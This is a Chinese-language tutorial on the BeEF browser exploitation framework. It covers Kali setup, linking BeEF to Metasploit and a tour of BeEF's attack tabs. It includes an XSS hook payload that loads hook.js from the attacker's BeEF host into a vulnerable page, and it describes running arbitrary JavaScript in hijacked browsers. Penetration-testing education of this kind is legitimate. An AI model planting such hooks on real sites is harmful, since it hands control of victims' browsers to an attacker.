BeEF是瀏覽器攻擊框架的簡稱，是一款專注于瀏覽器端的滲透測試工具。 官網[http://beefproject.com](http://beefproject.com) kali中已經內置了BeEF，直接啟動輸入beef/beef登錄即可。  根據提示，訪問UI界面。 然后將下面代碼輸入到存在XSS漏洞的地方hook一個瀏覽器： `<script src="http://BeEF主機-IP:3000/hook.js"></script>`  如上圖，已經成功hook瀏覽器。 **連接metasploit：** （此部分選自[limit_anonymous](https://blog.csdn.net/u013526533)的51cto博客 原文地址：https://blog.csdn.net/u013526533/article/details/52449964 ） 要使用Metasploit豐富的攻擊模塊，需要做些配置 此時先確定以把更新源換為國內的： > 進入目錄/etc/apt/sources.list deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib deb http://mirrors.ustc.edu.cn/kali-security kali-current/updates main contrib non-free deb-src http://mirrors.ustc.edu.cn/kali-security kali-current/updates main contrib non-free deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free > 然后更新系統： > apt-get update > apt-get upgrade > apt-get dist-upgrade > reboot 重啟之后 先切換進BEEF的目錄下面：cd /usr/share/beef-xss/ 切換進去之后，里面有個config.yaml文件，進行編輯 把metasploit功能模塊，enable設置為true 然后在當前目錄切換到：cd extensions/metasploit/ 需要配置三個地方： ~~~ host:本機IP callback host：本機IP {os: 'custom',path: '/usr/share/metasploit-framework/'} ~~~ 然后啟動msfconsole控制臺，輸入：load msgrpc ServerHost=IP Pass=abc123 這里的IP設置為你本機IP，不要設置為127.0.0.1 這時重新打開一個窗口切換到BEEF目錄下：`cd /usr/share/beef-xss/` 然后輸入`./beef`來啟動BEEF 之后顯示加載了292個metasploit模塊，然后打開beef就可以看到加載的metasploit模塊了 **關于BeEF的選項夾和功能** main：在運行一些命令模塊后，顯示瀏覽器的信息 logs：顯示連接日志 commands：命令模塊執行功能的地方 > 每個命令模塊都有一個交通圖燈，用來指示以下內容： > 命令模塊對目標進行操作，并且對目標不可見 > 命令模塊針對目標工作，但目標可以看到 > 該命令模塊還未對目標進行驗證 > 該命令模塊不針對此目標進行工作  XssRays: XssRays選項卡允許用戶檢查頁面的鏈接、表單和URI路徑是否容易受到XSS的攻擊。 Rider: Rider選項卡允許您為鉤狀瀏覽器提交任意的HTTP請求。 Network:網絡選項卡允許您與托管瀏覽器的本地網絡上的主機進行交互。 * * * * * 使用案例（給被劫持瀏覽器彈窗口）： `commands-Misc-Raw JavaScript-Execute`